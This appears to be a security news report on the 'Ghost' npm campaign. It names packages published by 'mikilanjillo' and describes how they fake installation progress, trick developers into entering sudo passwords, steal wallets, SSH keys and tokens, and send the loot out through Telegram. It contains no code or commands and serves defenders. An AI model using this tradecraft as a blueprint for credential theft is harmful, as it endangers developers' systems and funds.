Uses of Ghost Campaign 7 npm Packages That Steal Crypto Wallets and Passwords

Researchers in cybersecurity have found a new group of harmful npm packages that are meant to steal cryptocurrency wallets and private information. ReversingLabs is keeping an eye on the activity as the Ghost campaign. The following packages, all published by a user named mikilanjillo, have been found: react-performance-suite, react-state-optimizer-core, react-fast-utilsa, ai-fast-auto-trader, pkgnewfefame1, carbon-mac-copy-cloner, and coinbase-desktop-sdk.

The Node.js libraries that were found not only falsely claim to download more packages, but they also add random delays to make it look like the installation is happening. At one point during this step, the user is told that the installation is failing because it doesn't have permission to write to "/usr/local/lib/node_modules," which is where Node.js packages are usually installed on Linux and macOS systems.

It also tells the victim to type in their root or administrator password in order to finish the installation. Last month, the cloud security company Panther said that "react-state-optimizer" is one of several other npm packages published by "mikilanjillo." This means that the two groups of activities are the same: react-query-core-utils, react-state-optimizer, react-fast-utils, react-performance-suite, ai-fast-auto-trader, carbon-mac-copy-cloner, carbon-mac-copys-cloner, pkgnewfefame, and darkslash.

Security researcher Alessandra Rizzo said, "The packages come with a command-line interface (CLI) 'setup wizard' that tricks developers into entering their sudo password to do 'system optimizations.'" "The captured password is then passed to a comprehensive credential stealer payload that harvests browser credentials, cryptocurrency wallets, SSH keys, cloud provider configurations, and developer tool tokens." "Stolen data is routed to partner-specific Telegram bots based on a campaign identifier embedded in each loader, with credentials stored in the BSC smart contract and updated without modifying the malware itself." The initial npm package captures credentials and fetches configuration from either a Telegram channel or a Teletype.in page that's disguised as blockchain documentation to deploy the stealer.

According to Panther, the malware has two ways to make money. The first is by stealing credentials and sending them through partner Telegram channels. The second is by using affiliate URL redirects stored in a separate Binance Smart Chain (BSC) smart contract.

"This campaign shows that attackers are changing their tradecraft. For example, they are moving away from traditional package registries and into platforms like GitHub and new AI-assisted development workflows," Jamf said. "Attackers can easily add malicious code to environments by using trusted ecosystems and standard installation methods."